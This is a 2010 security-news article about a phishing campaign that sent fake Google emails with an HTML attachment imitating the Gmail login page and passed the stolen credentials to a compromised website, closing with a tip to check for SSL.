Daily cyber threats and internet security news: network security, online safety and latest security alerts
September 8th, 2010

New Gmail Phishing Campaign Attempts To Steal Login Credentials

Security researchers from Sunbelt warn of a new wave of spam emails, which masquerades as official communications from Google in an attempt to steal login credentials from Gmail users.

The fake emails are well formulated and display visual elements associated with Web search giant, such as the Google accounts logo or the copyright notice.

The messages purport to originate from the Google Team and read as follows:


Your Google account information is incomplete, We recommend that you update your Google account for security reasons.

Download and open the attachment in this mail and follow the direction to update your Google account.”

The attached file is an HTML document called Gmail_access.html. Opening it in any browser will display a fake page almost identical to the one used to sign into Gmail.

In fact the images and other elements present on the rogue page are actually loaded from Google’s real website. “If you check the attachment source code you can see that it sucks genuine Gmail page elements,” Tom Kelchner, writes on the Sunbelt blog.

The fake sign in form sends inputted data to a ServiceLoginAuth.php script hosted on an external domain, which stores it for the attackers. “The information entered on the bogus page is snatched by a site registered to someone in Sremska Kamenica, Serbia,” Kelchner explains.

However, this seems to be a legit website that has been compromised, as it runs an outdated and probably vulnerable version of the e107 content management system. This campaign appears to have started sometime at the beginning of this month as there are reports about it on the official Gmail help forum dating back to September 1.

Fortunately, there’s a simple way for users to always check if they are on the real Gmail login page or not, since the website comes with SSL enabled by default.

Credit: News

Share this item with others:

More on CyberInsecure:
  • Another Google Bug Put Users At Phishing Risk Due To Domain Flaw And Frame Injection Possibility
  • Gmail Exploit May Allow Attackers Steal E-mails By Setting Forwarding Filters
  • List of 20000 More Email Accounts From Gmail, Hotmail, Yahoo, AOL And Others Posted Online
  • Google Adds User Enabled HTTPS Secure Connections Into GMail
  • Warez Backdoor Allowed Hackers To Steal Twitter Passwords

  • If you found this information useful, consider linking to it from your own website.
    Just copy and paste the code below into your website (Ctrl+C to copy)
    It will look like this: New Gmail Phishing Campaign Attempts To Steal Login Credentials

    Leave a Reply

    Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.

    To prove you’re a person (not a spam script), type the security word shown in the picture. Click on the picture to hear an audio file of the word.